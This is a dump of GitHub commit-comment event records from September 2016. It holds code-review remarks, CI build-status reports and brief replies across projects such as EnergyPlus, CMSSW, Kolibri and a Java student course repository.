{"id":"4592744787","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19104804,"position":null,"line":null,"path":null,"commit_id":"33292be60050185d98dcfc765c1d5972362ff6b9","created_at":"2016-09-20T21:53:55Z","updated_at":"2016-09-20T21:53:55Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T21:53:55Z"}
{"id":"4592751688","type":"CommitCommentEvent","actor":{"login":"jamalex"},"repo":{"name":"christianmemije/kolibri"},"payload":{"comment":{"id":19104822,"position":46,"line":46,"path":"kolibri/content/test/test_downloadcontent.py","commit_id":"156c011331908685859c745dedc5d7bb7cf51eae","created_at":"2016-09-20T21:55:19Z","updated_at":"2016-09-20T21:55:19Z","body":"Note that in order to get a 200, you also need to write a file into the temp content dir. See my zip-indexing tests for reference. You can then also assert regarding the contents of the response."}},"created_at":"2016-09-20T21:55:19Z"}
{"id":"4592752285","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"antonyur/Java_GoIT_AntonYurchenko"},"payload":{"comment":{"id":19104825,"position":95,"line":95,"path":"src/module5/Room.java","commit_id":"87337df600b0c8ba19f09f0c5932cce12c53a9e4","created_at":"2016-09-20T21:55:26Z","updated_at":"2016-09-20T21:55:26Z","body":"Мне кажется ты писал хэш-функцию руками (это круто, никогда так не делал), и пропустил id, но используешь его в equals. Это может нарушить правило соотношения equals-hashcode, по которому два объекта, равных по equals будут иметь разный хэш. Предлагаю тебе почитать хабр про equals-hashcode чтобы понимать зачем эти методы, а я наверное какой-то материал в группу закину дополнительно"}},"created_at":"2016-09-20T21:55:26Z"}
{"id":"4592754511","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"antonyur/Java_GoIT_AntonYurchenko"},"payload":{"comment":{"id":19104830,"position":97,"line":97,"path":"src/module5/Room.java","commit_id":"87337df600b0c8ba19f09f0c5932cce12c53a9e4","created_at":"2016-09-20T21:55:53Z","updated_at":"2016-09-20T21:55:53Z","body":"методы с маленькой и кэмелКейсом"}},"created_at":"2016-09-20T21:55:53Z"}
{"id":"4592756535","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19104836,"position":276,"line":253,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T21:56:19Z","updated_at":"2016-09-20T21:56:19Z","body":"Fixed!\r\n"}},"created_at":"2016-09-20T21:56:19Z"}
{"id":"4592759103","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19104843,"position":282,"line":259,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T21:56:50Z","updated_at":"2016-09-20T21:56:50Z","body":"- Renamed variable\r\n- No longer keeping track of n_points"}},"created_at":"2016-09-20T21:56:50Z"}
{"id":"4592760898","type":"CommitCommentEvent","actor":{"login":"frank-trampe"},"repo":{"name":"fontforge/fontforge"},"payload":{"comment":{"id":19104847,"position":5,"line":28,"path":"travis-scripts/script_linux.sh","commit_id":"aa2dd8f10f7046c1085d40eb1315d11206712947","created_at":"2016-09-20T21:57:14Z","updated_at":"2016-09-20T21:57:14Z","body":"There is a lot of off-core time (waiting for disk accesses, mostly) in compilation, so having more tasks than cores (by some reasonable multiple) does make things faster.\r\n"}},"created_at":"2016-09-20T21:57:14Z"}
{"id":"4592765611","type":"CommitCommentEvent","actor":{"login":"jamalex"},"repo":{"name":"christianmemije/kolibri"},"payload":{"comment":{"id":19104860,"position":50,"line":50,"path":"kolibri/content/test/test_downloadcontent.py","commit_id":"156c011331908685859c745dedc5d7bb7cf51eae","created_at":"2016-09-20T21:58:11Z","updated_at":"2016-09-20T21:58:11Z","body":"To get a 404 here, even after you create the file on disk, you'll want to swap out some of the characters in the hash so it generates a different download URL (I think I may have done something like that in those zip tests)."}},"created_at":"2016-09-20T21:58:11Z"}
{"id":"4592767031","type":"CommitCommentEvent","actor":{"login":"axl89"},"repo":{"name":"pandorafms/pandorafms"},"payload":{"comment":{"id":19104862,"position":null,"line":null,"path":null,"commit_id":"ec352d16e17f1e42cb8aabb5f0163951be1bfb5e","created_at":"2016-09-20T21:58:29Z","updated_at":"2016-09-20T21:58:29Z","body":"Shouldn't be the last line of the `.travis.yml` file: `docker exec -it python $TRAVIS_BUILD_DIR/tests/run_console_tests.py`.\r\n\r\nExecuting it without the `docker exec` section causes the script to be executed from the Travis VM."}},"created_at":"2016-09-20T21:58:29Z"}
{"id":"4592768441","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"antonyur/Java_GoIT_AntonYurchenko"},"payload":{"comment":{"id":19104868,"position":15,"line":15,"path":"src/module5/DAOImpl2.java","commit_id":"87337df600b0c8ba19f09f0c5932cce12c53a9e4","created_at":"2016-09-20T21:58:47Z","updated_at":"2016-09-20T21:58:47Z","body":"а что если массив заполнится и вызвать save?"}},"created_at":"2016-09-20T21:58:47Z"}
{"id":"4592775611","type":"CommitCommentEvent","actor":{"login":"jackwoodward"},"repo":{"name":"SignalR/SignalR"},"payload":{"comment":{"id":19104899,"position":null,"line":null,"path":null,"commit_id":"6ce631433b57505b0b3f1fe24f68f0681fca5aef","created_at":"2016-09-20T22:00:13Z","updated_at":"2016-09-20T22:00:13Z","body":"should have mentioned we are using the .net client. Unless I missed something the server is still sending the keep alives, the client is just not checking it right? Back in SignalR 1 we had our own heartbeat monitor that would essentially do the same check as the built in monitor. When we moved to SignalR 2 I saw the heartbeat monitor was built in so disabled our monitor. My choice seems to be either re-enable the LongPollingTransport keep alive checks or turn our heartbeat monitor back on which does the same thing. Up for other suggestions(other than changing transports)."}},"created_at":"2016-09-20T22:00:13Z"}
{"id":"4592779867","type":"CommitCommentEvent","actor":{"login":"cmoha"},"repo":{"name":"wo80/CSparse.NET"},"payload":{"comment":{"id":19104908,"position":7,"line":101,"path":"CSparse/Converter.cs","commit_id":"6403ff0052d82093ea3d86cdf82886ea4531d542","created_at":"2016-09-20T22:01:01Z","updated_at":"2016-09-20T22:01:01Z","body":"Please remove this param."}},"created_at":"2016-09-20T22:01:01Z"}
{"id":"4592780137","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19104910,"position":null,"line":null,"path":null,"commit_id":"4067bc4270aedec12ff5f42e9f8d90d2469e800a","created_at":"2016-09-20T22:01:05Z","updated_at":"2016-09-20T22:01:05Z","body":"fast-forwarding develop-2.2 to borshop-integration-861-jv-feature-use_ets_for_riak_core_throttle = 040d500e"}},"created_at":"2016-09-20T22:01:05Z"}
{"id":"4592781518","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"antonyur/Java_GoIT_AntonYurchenko"},"payload":{"comment":{"id":19104914,"position":78,"line":78,"path":"src/module5/DAOImpl2.java","commit_id":"87337df600b0c8ba19f09f0c5932cce12c53a9e4","created_at":"2016-09-20T22:01:23Z","updated_at":"2016-09-20T22:01:23Z","body":"можно использовать Array.copy или System.copyarray"}},"created_at":"2016-09-20T22:01:23Z"}
{"id":"4592785283","type":"CommitCommentEvent","actor":{"login":"flagoss"},"repo":{"name":"Arcaratus/BloodArsenal"},"payload":{"comment":{"id":19104926,"position":null,"line":null,"path":null,"commit_id":"f5fc3bd7e952073259d545930716de9ac2609fc9","created_at":"2016-09-20T22:02:13Z","updated_at":"2016-09-20T22:02:13Z","body":"Yep I downloaded the zip"}},"created_at":"2016-09-20T22:02:13Z"}
{"id":"4592789059","type":"CommitCommentEvent","actor":{"login":"blavigne13"},"repo":{"name":"blavigne13/codemaid"},"payload":{"comment":{"id":19104934,"position":null,"line":null,"path":null,"commit_id":"21325cb6876ace14479adbd0ebf1453ae85fd178","created_at":"2016-09-20T22:03:00Z","updated_at":"2016-09-20T22:03:00Z","body":"Added negative look-behind assertion to ensure that the blank lines to be replaced are not preceded by an un-terminated verbatim string:\r\n* commercial at: @\r\n* double-quote: \" \r\n* zero or more of:\r\n  * pairs of double-quotes: \"\"\r\n  * or single non-double-quotes: ^\""}},"created_at":"2016-09-20T22:03:00Z"}
{"id":"4592790538","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19104939,"position":null,"line":null,"path":null,"commit_id":"fc494f1f47f8e9a330c09de67fd4bf7736341bd5","created_at":"2016-09-20T22:03:17Z","updated_at":"2016-09-20T22:03:17Z","body":"For future reference, ````event_flags`=`event_flags`|0x200``` please."}},"created_at":"2016-09-20T22:03:17Z"}
{"id":"4592791282","type":"CommitCommentEvent","actor":{"login":"MarcusTwist"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19104941,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-20T22:03:26Z","updated_at":"2016-09-20T22:03:26Z","body":"Also really interested in this tweak but have no idea how to compile it, can it be installed using Cydia if it was compiled and added to a repo?"}},"created_at":"2016-09-20T22:03:26Z"}
{"id":"4592791624","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19104943,"position":null,"line":null,"path":null,"commit_id":"fc494f1f47f8e9a330c09de67fd4bf7736341bd5","created_at":"2016-09-20T22:03:30Z","updated_at":"2016-09-20T22:03:30Z","body":"e.g. bitwise or against existing value instead of overriding"}},"created_at":"2016-09-20T22:03:30Z"}
{"id":"4592792718","type":"CommitCommentEvent","actor":{"login":"gwiebe"},"repo":{"name":"gwiebe/Project-Numero-Uno"},"payload":{"comment":{"id":19104948,"position":1,"line":1,"path":"README.md","commit_id":"356931744da626ea51b24542cb345d6e2b9765d7","created_at":"2016-09-20T22:03:44Z","updated_at":"2016-09-20T22:03:44Z","body":"# "}},"created_at":"2016-09-20T22:03:44Z"}
{"id":"4592799291","type":"CommitCommentEvent","actor":{"login":"gwiebe"},"repo":{"name":"gwiebe/Project-Numero-Uno"},"payload":{"comment":{"id":19104956,"position":2,"line":2,"path":"README.md","commit_id":"356931744da626ea51b24542cb345d6e2b9765d7","created_at":"2016-09-20T22:04:56Z","updated_at":"2016-09-20T22:04:56Z","body":"![image](https://cloud.githubusercontent.com/assets/21350373/18690570/5832fa1e-7f54-11e6-911a-31b80cf408e0.png)\r\n"}},"created_at":"2016-09-20T22:04:56Z"}
{"id":"4592800491","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19104958,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-20T22:05:13Z","updated_at":"2016-09-20T22:05:13Z","body":"ASIHP-validation1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2361 of 2372 tests passed, 0 test warnings)\n\n * 11 tests had: AUD diffs.\n * 11 tests had: ERR diffs.\n * 8 tests had: Table big diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.54%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T22:05:13Z"}
{"id":"4592802259","type":"CommitCommentEvent","actor":{"login":"byuniqueman"},"repo":{"name":"byuniqueman/pyproj"},"payload":{"comment":{"id":19104961,"position":null,"line":null,"path":null,"commit_id":"5f004b45db77613da8bfacc936ded3e3278f28ea","created_at":"2016-09-20T22:05:33Z","updated_at":"2016-09-20T22:05:33Z","body":"this looks good to me!"}},"created_at":"2016-09-20T22:05:33Z"}
{"id":"4592803943","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":19104965,"position":58,"line":3708,"path":"psi4/share/psi4/python/procedures/functional.py","commit_id":"78c0ff79703e5b1f5ce6ff3f6d6d8d418f9c26e6","created_at":"2016-09-20T22:05:54Z","updated_at":"2016-09-20T22:05:54Z","body":"probable typo"}},"created_at":"2016-09-20T22:05:54Z"}
{"id":"4592804015","type":"CommitCommentEvent","actor":{"login":"gwiebe"},"repo":{"name":"gwiebe/Project-Numero-Uno"},"payload":{"comment":{"id":19104966,"position":8,"line":8,"path":"README.md","commit_id":"356931744da626ea51b24542cb345d6e2b9765d7","created_at":"2016-09-20T22:05:55Z","updated_at":"2016-09-20T22:05:55Z","body":"![image](https://cloud.githubusercontent.com/assets/21350373/18690593/7c508042-7f54-11e6-9210-0fe379d5c82d.png)\r\n"}},"created_at":"2016-09-20T22:05:55Z"}
{"id":"4592807231","type":"CommitCommentEvent","actor":{"login":"azizshamim"},"repo":{"name":"jonico/speedup-builds"},"payload":{"comment":{"id":19104969,"position":6,"line":5,"path":"README.md","commit_id":"2a5b16a558e06852122c0ee18a0519011ec418b6","created_at":"2016-09-20T22:06:34Z","updated_at":"2016-09-20T22:06:34Z","body":"Might not work as expected. [ref](https://github.com/CocoaPods/CocoaPods/issues/4989#issuecomment-193838934)\r\n\r\nA better workflow would be to clone a local repo and then fetch into it."}},"created_at":"2016-09-20T22:06:34Z"}
{"id":"4592808491","type":"CommitCommentEvent","actor":{"login":"gwiebe"},"repo":{"name":"gwiebe/Project-Numero-Uno"},"payload":{"comment":{"id":19104973,"position":19,"line":19,"path":"README.md","commit_id":"356931744da626ea51b24542cb345d6e2b9765d7","created_at":"2016-09-20T22:06:50Z","updated_at":"2016-09-20T22:06:50Z","body":"![image](https://cloud.githubusercontent.com/assets/21350373/18690622/9d9fc4ba-7f54-11e6-926d-70ba80b40c18.png)\r\n"}},"created_at":"2016-09-20T22:06:50Z"}
{"id":"4592810824","type":"CommitCommentEvent","actor":{"login":"azizshamim"},"repo":{"name":"jonico/speedup-builds"},"payload":{"comment":{"id":19104978,"position":7,"line":6,"path":"README.md","commit_id":"2a5b16a558e06852122c0ee18a0519011ec418b6","created_at":"2016-09-20T22:07:18Z","updated_at":"2016-09-20T22:07:18Z","body":"Combined with ☝️ fetching just the branch that changed is the best option."}},"created_at":"2016-09-20T22:07:18Z"}
{"id":"4592816479","type":"CommitCommentEvent","actor":{"login":"kpedro88"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19104987,"position":4,"line":31,"path":"EventFilter/HcalRawToDigi/interface/HcalUnpacker.h","commit_id":"5da0e171472b5db8e26c631aea0d83e4c8b5c4b6","created_at":"2016-09-20T22:08:31Z","updated_at":"2016-09-20T22:08:31Z","body":"`ZDCDataFrame` is the QIE8 digi - not needed for RPD"}},"created_at":"2016-09-20T22:08:31Z"}
{"id":"4592819065","type":"CommitCommentEvent","actor":{"login":"kpedro88"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19104998,"position":13,"line":60,"path":"EventFilter/HcalRawToDigi/plugins/HcalRawToDigi.cc","commit_id":"5da0e171472b5db8e26c631aea0d83e4c8b5c4b6","created_at":"2016-09-20T22:09:06Z","updated_at":"2016-09-20T22:09:06Z","body":"`ZDCDigiCollection` is for the QIE8 digis - not needed for RPD\r\nin the RPD case, this should produce a `QIE10DigiCollection`"}},"created_at":"2016-09-20T22:09:06Z"}
{"id":"4592820384","type":"CommitCommentEvent","actor":{"login":"kpedro88"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19105000,"position":29,"line":115,"path":"EventFilter/HcalRawToDigi/plugins/HcalRawToDigi.cc","commit_id":"5da0e171472b5db8e26c631aea0d83e4c8b5c4b6","created_at":"2016-09-20T22:09:24Z","updated_at":"2016-09-20T22:09:24Z","body":"`ZDCDataFrame` is the QIE8 digi - not needed for RPD"}},"created_at":"2016-09-20T22:09:24Z"}
{"id":"4592823772","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19105006,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-20T22:10:10Z","updated_at":"2016-09-20T22:10:10Z","body":"ASIHP-validation1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T22:10:10Z"}
{"id":"4592825102","type":"CommitCommentEvent","actor":{"login":"deniseschannon"},"repo":{"name":"rancher/cattle"},"payload":{"comment":{"id":19105012,"position":null,"line":null,"path":null,"commit_id":"77ec711908d5fe83a2f4f2b64b906347781df08c","created_at":"2016-09-20T22:10:27Z","updated_at":"2016-09-20T22:10:27Z","body":"https://github.com/rancher/rancher/issues/5953"}},"created_at":"2016-09-20T22:10:27Z"}
{"id":"4592825161","type":"CommitCommentEvent","actor":{"login":"srowen"},"repo":{"name":"jpmml/jpmml-model"},"payload":{"comment":{"id":19105013,"position":4,"line":5,"path":"pmml-model/src/main/java/org/dmg/pmml/package-info.java","commit_id":"ee450455ce271cfc0fe5fdd6632fc6487d403ff8","created_at":"2016-09-20T22:10:28Z","updated_at":"2016-09-20T22:10:28Z","body":"Nice one, that helps make the output more deterministic"}},"created_at":"2016-09-20T22:10:28Z"}
{"id":"4592825421","type":"CommitCommentEvent","actor":{"login":"kpedro88"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19105014,"position":83,"line":280,"path":"EventFilter/HcalRawToDigi/plugins/HcalRawToDigi.cc","commit_id":"5da0e171472b5db8e26c631aea0d83e4c8b5c4b6","created_at":"2016-09-20T22:10:31Z","updated_at":"2016-09-20T22:10:31Z","body":"Trying to swap a `ZDCDigiCollection` and `QIE10DigiCollection` will not work, as they are not the same type"}},"created_at":"2016-09-20T22:10:31Z"}
{"id":"4592826916","type":"CommitCommentEvent","actor":{"login":"dgasmith"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":19105017,"position":58,"line":3708,"path":"psi4/share/psi4/python/procedures/functional.py","commit_id":"78c0ff79703e5b1f5ce6ff3f6d6d8d418f9c26e6","created_at":"2016-09-20T22:10:50Z","updated_at":"2016-09-20T22:10:50Z","body":"Yup, fixed in next patch."}},"created_at":"2016-09-20T22:10:50Z"}
{"id":"4592829288","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/literate-scientific-software"},"payload":{"comment":{"id":19105019,"position":null,"line":null,"path":null,"commit_id":"621f5d4ec1e0ba30fd57fe11cbec2f1c45376c81","created_at":"2016-09-20T22:11:22Z","updated_at":"2016-09-20T22:11:22Z","body":"Note that this is really not what I was expecting as a test.  It is indeed a good \"quick and dirty\" test for the purposes, but not a good way to do things longer term.  What Spencer linked to is lower-tech, but more what we had in mind."}},"created_at":"2016-09-20T22:11:22Z"}
{"id":"4592829920","type":"CommitCommentEvent","actor":{"login":"gwiebe"},"repo":{"name":"gwiebe/Project-Numero-Uno"},"payload":{"comment":{"id":19105021,"position":1,"line":1,"path":"README.md","commit_id":"356931744da626ea51b24542cb345d6e2b9765d7","created_at":"2016-09-20T22:11:31Z","updated_at":"2016-09-20T22:11:31Z","body":"# "}},"created_at":"2016-09-20T22:11:31Z"}
{"id":"4592830655","type":"CommitCommentEvent","actor":{"login":"gwiebe"},"repo":{"name":"gwiebe/Project-Numero-Uno"},"payload":{"comment":{"id":19105024,"position":1,"line":1,"path":"README.md","commit_id":"356931744da626ea51b24542cb345d6e2b9765d7","created_at":"2016-09-20T22:11:42Z","updated_at":"2016-09-20T22:11:42Z","body":"****"}},"created_at":"2016-09-20T22:11:42Z"}
{"id":"4592831370","type":"CommitCommentEvent","actor":{"login":"kpedro88"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19105027,"position":18,"line":690,"path":"EventFilter/HcalRawToDigi/src/HcalUnpacker.cc","commit_id":"5da0e171472b5db8e26c631aea0d83e4c8b5c4b6","created_at":"2016-09-20T22:11:52Z","updated_at":"2016-09-20T22:11:52Z","body":"Is this just adding every piece of RAW identified as QIE10 to both the HF and RPD collections? That doesn't seem right..."}},"created_at":"2016-09-20T22:11:52Z"}
{"id":"4592834182","type":"CommitCommentEvent","actor":{"login":"sargun"},"repo":{"name":"GoelDeepak/minuteman"},"payload":{"comment":{"id":19105036,"position":12,"line":14,"path":"src/minuteman_app.erl","commit_id":"d59b408317c6c8923b0e01589ba8143c3ccb67cd","created_at":"2016-09-20T22:12:27Z","updated_at":"2016-09-20T22:12:27Z","body":"What if this file / folder is missing?"}},"created_at":"2016-09-20T22:12:27Z"}
{"id":"4592834569","type":"CommitCommentEvent","actor":{"login":"kpedro88"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19105037,"position":57,"line":207,"path":"EventFilter/HcalRawToDigi/plugins/HcalRawToDigi.cc","commit_id":"5da0e171472b5db8e26c631aea0d83e4c8b5c4b6","created_at":"2016-09-20T22:12:32Z","updated_at":"2016-09-20T22:12:32Z","body":"I think you are modifying an out of date version here - `std::auto_ptr` is no longer used in CMSSW_8_1_X."}},"created_at":"2016-09-20T22:12:32Z"}
{"id":"4592834591","type":"CommitCommentEvent","actor":{"login":"terrylyons"},"repo":{"name":"ctapang/caffe"},"payload":{"comment":{"id":19105038,"position":null,"line":null,"path":null,"commit_id":"cdd2cd8deea531ddc8528fc470160d374823acd6","created_at":"2016-09-20T22:12:32Z","updated_at":"2016-09-20T22:12:32Z","body":"I am pleased you found my suggestion helpful. I am afraid I am a newbie to things like making proposed changes to the code. That is why I wrote the messages the way I did. I am very heavily committed right now - so it will have to wait. However, I am quite comfortable if someone else does it in the mean time. Or did you do it for everybody here?"}},"created_at":"2016-09-20T22:12:32Z"}
{"id":"4592836626","type":"CommitCommentEvent","actor":{"login":"gwiebe"},"repo":{"name":"gwiebe/Project-Numero-Uno"},"payload":{"comment":{"id":19105043,"position":14,"line":14,"path":"README.md","commit_id":"356931744da626ea51b24542cb345d6e2b9765d7","created_at":"2016-09-20T22:13:00Z","updated_at":"2016-09-20T22:13:00Z","body":"![image](https://cloud.githubusercontent.com/assets/21350373/18690766/7ad0ea12-7f55-11e6-8486-72937d435a89.png)\r\n"}},"created_at":"2016-09-20T22:13:00Z"}
{"id":"4592841319","type":"CommitCommentEvent","actor":{"login":"andersio"},"repo":{"name":"ReactiveCocoa/ReactiveSwift"},"payload":{"comment":{"id":19105050,"position":30,"line":192,"path":"Sources/Action.swift","commit_id":"1341fdba055dc9f60fbe79468b96d0831019d18e","created_at":"2016-09-20T22:14:00Z","updated_at":"2016-09-20T22:14:00Z","body":"Likely because `ActionProtocol` is not a class protocol."}},"created_at":"2016-09-20T22:14:00Z"}
{"id":"4592845216","type":"CommitCommentEvent","actor":{"login":"sargun"},"repo":{"name":"GoelDeepak/minuteman"},"payload":{"comment":{"id":19105062,"position":13,"line":15,"path":"src/minuteman_app.erl","commit_id":"d59b408317c6c8923b0e01589ba8143c3ccb67cd","created_at":"2016-09-20T22:14:51Z","updated_at":"2016-09-20T22:14:51Z","body":"Break this up into two statements. \r\nSee: https://github.com/inaka/erlang_guidelines"}},"created_at":"2016-09-20T22:14:51Z"}
{"id":"4592846509","type":"CommitCommentEvent","actor":{"login":"drmaples"},"repo":{"name":"luqmaan/luqmaan.github.io"},"payload":{"comment":{"id":19105066,"position":null,"line":null,"path":null,"commit_id":"b5e4eaf1957573d503285d468a0a80046340c2ec","created_at":"2016-09-20T22:15:10Z","updated_at":"2016-09-20T22:15:10Z","body":"please add your phone number back so i can call you"}},"created_at":"2016-09-20T22:15:10Z"}
{"id":"4592849947","type":"CommitCommentEvent","actor":{"login":"sargun"},"repo":{"name":"GoelDeepak/minuteman"},"payload":{"comment":{"id":19105072,"position":34,"line":32,"path":"src/minuteman_app.erl","commit_id":"d59b408317c6c8923b0e01589ba8143c3ccb67cd","created_at":"2016-09-20T22:15:52Z","updated_at":"2016-09-20T22:15:52Z","body":"Could not load config? Also, what about other error conditions? I think if we get to this point, we shouldn't neccessarily get an enoent, because this is the result of the listdir above?"}},"created_at":"2016-09-20T22:15:52Z"}
{"id":"4592862188","type":"CommitCommentEvent","actor":{"login":"nidico"},"repo":{"name":"SviMik/pad"},"payload":{"comment":{"id":19105100,"position":null,"line":null,"path":null,"commit_id":"a97a21829243537a1cea5dfa2efd3ae5b7d9cf95","created_at":"2016-09-20T22:18:34Z","updated_at":"2016-09-20T22:18:34Z","body":"Yay, awesome, thanks!"}},"created_at":"2016-09-20T22:18:34Z"}
{"id":"4592863044","type":"CommitCommentEvent","actor":{"login":"TEC10101"},"repo":{"name":"TEC10101/Portfolio"},"payload":{"comment":{"id":19105102,"position":null,"line":null,"path":null,"commit_id":"29b625d092b0ae5cf7ebe065765cf3ddad586e87","created_at":"2016-09-20T22:18:45Z","updated_at":"2016-09-20T22:18:45Z","body":"Links in the body are padded-left by about 60px; need to fix."}},"created_at":"2016-09-20T22:18:45Z"}
{"id":"4592865783","type":"CommitCommentEvent","actor":{"login":"TEC10101"},"repo":{"name":"TEC10101/Portfolio"},"payload":{"comment":{"id":19105111,"position":null,"line":null,"path":null,"commit_id":"29b625d092b0ae5cf7ebe065765cf3ddad586e87","created_at":"2016-09-20T22:19:23Z","updated_at":"2016-09-20T22:19:23Z","body":"Likely having to do with the ol, check out the CSS and iron this out"}},"created_at":"2016-09-20T22:19:23Z"}
{"id":"4592866106","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19105112,"position":null,"line":null,"path":null,"commit_id":"2f3c46f9e5d82c93e2ece6ae7267c3c331d2ad06","created_at":"2016-09-20T22:19:28Z","updated_at":"2016-09-20T22:19:28Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#b5Mrp3D5TZeLJqGeAueyPg"}},"created_at":"2016-09-20T22:19:28Z"}
{"id":"4592869623","type":"CommitCommentEvent","actor":{"login":"cthrash"},"repo":{"name":"cthrash/project-oxford"},"payload":{"comment":{"id":19105120,"position":null,"line":null,"path":null,"commit_id":"afb57c2396f224560b00f847a0a9e91fd0915b03","created_at":"2016-09-20T22:20:19Z","updated_at":"2016-09-20T22:20:19Z","body":"The failing local emotion test has been fixed."}},"created_at":"2016-09-20T22:20:19Z"}
{"id":"4592869838","type":"CommitCommentEvent","actor":{"login":"wo80"},"repo":{"name":"wo80/CSparse.NET"},"payload":{"comment":{"id":19105121,"position":7,"line":101,"path":"CSparse/Converter.cs","commit_id":"6403ff0052d82093ea3d86cdf82886ea4531d542","created_at":"2016-09-20T22:20:22Z","updated_at":"2016-09-20T22:20:22Z","body":"Done."}},"created_at":"2016-09-20T22:20:22Z"}
{"id":"4592890610","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19105173,"position":null,"line":null,"path":null,"commit_id":"b3aaddd9f24b80e3fd2bd9eb1bfa8edc602476a7","created_at":"2016-09-20T22:25:03Z","updated_at":"2016-09-20T22:25:03Z","body":"\nBuild report #161473180 for sha b3aaddd9f24b80e3fd2bd9eb1bfa8edc602476a7:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.08%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2829%20/%209913%20%2828.54%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-24.06%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/feature/unitests/)\n      "}},"created_at":"2016-09-20T22:25:03Z"}
